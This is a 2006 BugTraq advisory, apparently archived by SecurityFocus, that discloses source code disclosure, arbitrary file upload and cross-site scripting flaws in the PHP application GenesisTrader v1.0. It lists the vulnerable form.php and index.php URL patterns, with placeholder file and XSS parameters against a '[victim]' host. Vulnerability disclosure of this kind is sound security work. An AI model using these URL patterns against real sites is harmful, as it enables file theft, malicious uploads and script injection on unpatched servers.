BugTraq
GenesisTrader v1.0 - Multiple Vulnerabilities Dec 14 2006 02:32AM
mr_kaliman msn com
GenesisTrader v1.0
------------------
Vendor site: http://www.genesis-php.com/
Product: GenesisTrader v1.0
Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 06/12/06
Public disclosure: 14/12/06

Description:
------------

Source Code Disclosure:(No need to be registered)
http://[victim]/[path]/form.php?floap=modfich&do=[FILE]
http://[victim]/[path]/form.php?floap=modfich&chem=[FILE]

Arbitrary File Upload:(NEED to be registered)
http://[victim]/[path]/form.php?floap=ajoutfich
form.php -> upload.php (all type and extensions allowed)

XSS:(No need to be registered)
http://[victim]/[path]/index.php?cuve=[XSS]
http://[victim]/[path]/form.php?floap=ajoutfich&cuve=[XSS]
http://[victim]/[path]/form.php?floap=modfich&chem=[XSS]
http://[victim]/[path]/form.php?floap=modfich&do=[XSS]
http://[victim]/[path]/form.php?floap=rename&chem=[XSS]
http://[victim]/[path]/form.php?floap=rename&do=[XSS]
http://[victim]/[path]/form.php?floap=copy&chem=[XSS]
http://[victim]/[path]/form.php?floap=copy&do=[XSS]
http://[victim]/[path]/form.php?floap=chmod&chem=[XSS]
http://[victim]/[path]/form.php?floap=chmod&do=[XSS]
etc... in form.php?floap=...

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus